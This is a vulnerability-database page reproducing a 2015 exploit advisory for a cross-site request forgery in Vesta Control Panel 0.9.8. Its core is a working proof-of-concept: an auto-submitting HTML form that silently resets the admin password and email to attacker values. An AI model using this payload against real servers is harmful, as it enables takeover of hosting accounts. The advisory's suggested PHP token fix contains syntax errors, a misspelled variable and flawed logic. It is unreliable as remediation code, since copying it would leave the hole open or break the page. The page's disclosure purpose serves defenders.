Vulners
Lucene search
Vesta Control Panel 0.9.8 Cross Site Request Forgery
🗓️ 25 May 2015 00:00:00Reported by Ben khlifa FahmiType 
packetstorm🔗 packetstormsecurity.com👁 20 Views
`# Exploit Title: Vesta Control Panel CSRF(change admin password)
# Date: 24-05-2015
# Exploit Author: Ben Khlifa Fahmi
# Vendor Homepage: https://vestacp.com/
# Software Link: http://vestacp.com/pub/vst-install.sh
# Version: 0.9.8(amd64)
# Tested on: ubuntu trusty 14.04
Description:
---------------------------------------------------------------
The vulnerability exist on the page /edit/user/index.php
The VESTA CP is vulnerable to CSRF Where an attacker can change "admin" password
by sending to already logged in user , once the victim visit the page the user password will changed
to the one has been set by attacker.
Exploit Code :
<html>
<head><title>Victim will redirect auto</title></head>
<body onload="document.forms[0].submit()">
<form>
<form id="vstobjects" method="post" name="v_edit_user" action="https://[target]:8083/edit/user/?user=admin">
<input type="hidden" name="v_user" value="admin" >
<input type="hidden" name="v_username" value="admin">
<input type="hidden" name="v_password" value="[hacker pass]">
<input type="hidden" name="v_email" value="[hacker mail]">
<input type="hidden" name="v_package" value="default" />
<input type="hidden" name="v_language" value="ar" />
<input type="hidden" name="v_fname" value="System">
<input type="hidden" name="v_lname" value="Administrator">
<input type="hidden" name="v_shell" value="bash" />
<input type="hidden" value="ns1.localhost.ltd">
<input type="hidden" value="ns2.localhost.ltd">
<input type="hidden" name="v_ns3">
<input type="hidden" name="v_ns4">
<input type="submit" class="button" name="save" value="Save">
</form>
</body>
</html>
Impact : Critical as an attacker can change admin email , password, dns ....
Solution :
add this code to the page /edit/user/index.php after the session start
$token = uniqid(mt_rand(), true);
if(!isset($_POST)){
$_SESSION['token'] = $token;
}
if(isset($_POST['token']))
if(!($_SESSION['token'] === $_POST['token'])){
header('location: /error/');
}
}
and at the end of page add
$_SESSION['token'] = $toke;
also don't forget to add this html just in the form on page :
<form id="vstobjects" method="post" name="v_edit_user">
<input type="hidden" name="token" value="<?php echo $_SESSION['token'];?>"/>
Greetz to : ArabOUG Cyber Security Team, Tunisian Whitehat Security , Tunisian Agency of Internet Team , BenCure CERT Team(Ben Yahia Mohamed, Ben Salem Salma, Ben khlifa Fahmi(me), Moez Chakchouk, Ben Mne Tarek) Amine Zemzemi , Saif Bejaoui , Mohamed Amen Allah Bechikh , Youssef Warheni , Manel Nouali , Ben Gharbia Jihed , and all my friends
And a special Greetz to my fiancé <3
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 May 2015 00:00Current
0.6Low risk
Vulners AI Score0.6